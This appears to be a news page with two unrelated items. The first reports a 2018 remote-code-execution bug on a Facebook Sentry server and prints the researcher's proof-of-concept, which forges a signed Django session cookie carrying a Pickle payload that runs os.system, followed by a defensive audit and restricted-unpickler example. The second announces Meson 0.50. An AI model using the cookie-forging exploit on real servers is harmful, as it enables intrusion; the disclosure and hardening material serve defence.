Another Facebook Vulnerability Found

A cybersecurity specialist from SCRT found a way to execute code remotely on a Facebook server
27 August 2018

Daniel Le Gall from SCRT reported a vulnerability he found in one of Facebook's servers. The problem was in Sentry, a web application for log storage written in Python on the Django framework. Facebook has since patched the hole in the server.

Daniel found the problem while scanning IP address ranges belonging to the social network. One of them hosted a Sentry service under the host name sentryagreements.thefacebook.com. While reviewing the application, he noticed a stack trace that appeared for no obvious reason, as well as problems with the user password reset function. According to him, Django debug mode had not been disabled, so the trace exposed the application's entire environment:

[Screenshots: Facebook Vulnerability]

Among the environment keys the SCRT expert found SESSION_SERIALIZER, set to django.contrib.sessions.serializers.PickleSerializer. Daniel explained that with a forged session containing arbitrary data in Pickle, Python's binary object serialization protocol, any code can be run on the system. To sign such a session he needed the Django secret key, which appeared in plaintext in the Sentry settings list under the name system.secret-key:

[Screenshots: Facebook Vulnerability]

The researcher wrote a proof-of-concept script that replaced the contents of the existing sentrysid cookie with an arbitrary object, making the page take 30 seconds longer to load:

#!/usr/bin/env python
# Proof of concept as described in the article: decode the legitimate sentrysid
# session with the leaked SECRET_KEY, insert a Pickle payload that sleeps 30 s,
# and re-sign it so Sentry accepts the forged cookie.
import os

import django.core.signing
import django.contrib.sessions.serializers

SECRET_KEY = '[RETRIEVEDKEY]'  # the system.secret-key value shown on the debug page
SERIALIZER = django.contrib.sessions.serializers.PickleSerializer
SALT = 'django.contrib.sessions.backends.signed_cookies'

# Initial cookie I had on sentry when trying to reset a password
cookie = 'gAJ9cQFYCgAAAHRlc3Rjb29raWVxAlgGAAAAd29ya2VkcQNzLg:1fjsBy:FdZ8oz3sQBnx2TPyncNt0LoyiAw'

# Verify the signature and unpickle the existing session content
newContent = django.core.signing.loads(cookie, key=SECRET_KEY, serializer=SERIALIZER, salt=SALT)


class PickleRce(object):
    # __reduce__ names the callable pickle will invoke when the object is loaded
    def __reduce__(self):
        return (os.system, ("sleep 30",))


newContent['testcookie'] = PickleRce()

# Re-serialize and re-sign; the output is the forged sentrysid cookie value
print(django.core.signing.dumps(newContent, key=SECRET_KEY, serializer=SERIALIZER,
                                salt=SALT, compress=True))
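Why the two settings above combined into code execution, and what a defender checks for, as an added example that is neither the researcher's script nor Sentry's or Django's code. It uses only the Python standard library (no Django): the two serializer module paths are Django's real identifiers, the settings dicts and the session payload are constructed samples, and the callable invoked by the forged object is the harmless built-in len() standing in for the PoC's os.system. Django's default session serializer has been JSONSerializer since 1.6; the restricted unpickler is a general hardening pattern for code that must keep accepting Pickle, not something Sentry ships.

```python
import io
import json
import pickle

# Real Django module paths for the two session serializers; the settings dicts
# used below are constructed samples, not configuration from the Facebook host.
PICKLE_SERIALIZER = "django.contrib.sessions.serializers.PickleSerializer"
JSON_SERIALIZER = "django.contrib.sessions.serializers.JSONSerializer"


def audit_settings(settings):
    """Flag the two settings that chained into remote code execution in the article:
    debug error pages leaking SECRET_KEY, and a session serializer that executes
    attacker-chosen callables on load."""
    findings = []
    if settings.get("DEBUG"):
        findings.append("DEBUG is on: error pages expose settings, including SECRET_KEY")
    if settings.get("SESSION_SERIALIZER") == PICKLE_SERIALIZER:
        findings.append("SESSION_SERIALIZER is PickleSerializer: a forged but validly "
                        "signed session runs code when it is unpickled")
    return findings


class ReduceDemo:
    """Stand-in for an attacker-controlled session value. __reduce__ names the
    callable pickle invokes on load; here it is the built-in len() instead of
    os.system, so loading has no side effect beyond the returned value."""

    def __reduce__(self):
        return (len, ("payload",))


def forged_session_bytes():
    """Constructed session payload: a normal session dict with one poisoned value."""
    return pickle.dumps({"testcookie": ReduceDemo()})


def unsafe_loads(data):
    """What PickleSerializer does on every request: pickle.loads honours __reduce__,
    so len("payload") runs during the load and its result lands in the session."""
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    """Refuses to resolve any global. A __reduce__ payload must look its callable up
    (builtins.len here, os.system in the PoC) through find_class, so the load fails
    before anything is invoked, while dict/str/int sessions need no globals and
    still load normally."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")


def safe_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def safe_loads_blocks(data):
    """True when the restricted unpickler rejects the payload."""
    try:
        safe_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


def benign_session_loads():
    """Show that a plain session survives the restricted unpickler."""
    return safe_loads(pickle.dumps({"user": 1}))


def json_rejects(session):
    """JSONSerializer cannot carry arbitrary objects at all: a poisoned value fails
    at serialization time rather than executing on load."""
    try:
        json.dumps(session)
    except TypeError:
        return True
    return False


if __name__ == "__main__":
    exposed = {"DEBUG": True, "SESSION_SERIALIZER": PICKLE_SERIALIZER}
    hardened = {"DEBUG": False, "SESSION_SERIALIZER": JSON_SERIALIZER}
    for finding in audit_settings(exposed):
        print("finding:", finding)
    print("hardened findings:", audit_settings(hardened))
    payload = forged_session_bytes()
    print("pickle.loads ran len('payload'):", unsafe_loads(payload))
    print("restricted unpickler blocks it:", safe_loads_blocks(payload))
    print("benign session still loads:", benign_session_loads())
    print("JSON refuses the object:", json_rejects({"testcookie": ReduceDemo()}))
```

The point to take from unsafe_loads is that the signature in the PoC never failed: signing only proves possession of SECRET_KEY, so once the key leaks through a debug page the serializer alone decides whether a forged session is a nuisance or code execution.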

He reported the vulnerability to the Facebook team and received $5000 under the Bug Bounty program. The company's specialists fixed the issue within 10 days of receiving the report.

Meson 0.50 Released

The key development goal of Meson is to ensure a high speed of the assembly process, combined with convenience and ease of use
11 March 2019

Meson 0.50 has been released. The build system is used by projects such as X.Org Server, Mesa, Lighttpd, systemd, GStreamer, Wayland, GNOME and GTK+. Meson is written in Python and distributed under the Apache 2.0 license.

Meson's key development goal is a fast build process combined with convenience and ease of use. By default it drives the Ninja toolkit instead of the make utility, but other backends such as Xcode and Visual Studio can also be used. A multi-platform dependency handler is built in, which lets Meson be used to build packages for distributions. Build rules are written in a simplified domain-specific language that is meant to be readable and understandable to the user (the authors' idea being that the developer should spend as little time as possible writing rules).

Cross-compilation and building on Linux, macOS and Windows with GCC, Clang, Visual Studio and other compilers are supported, for projects in languages including C, C++, Fortran, Java and Rust. An incremental build mode rebuilds only the components affected by changes made since the last build. Meson can also produce reproducible builds, where running the build in different environments yields completely identical executable files.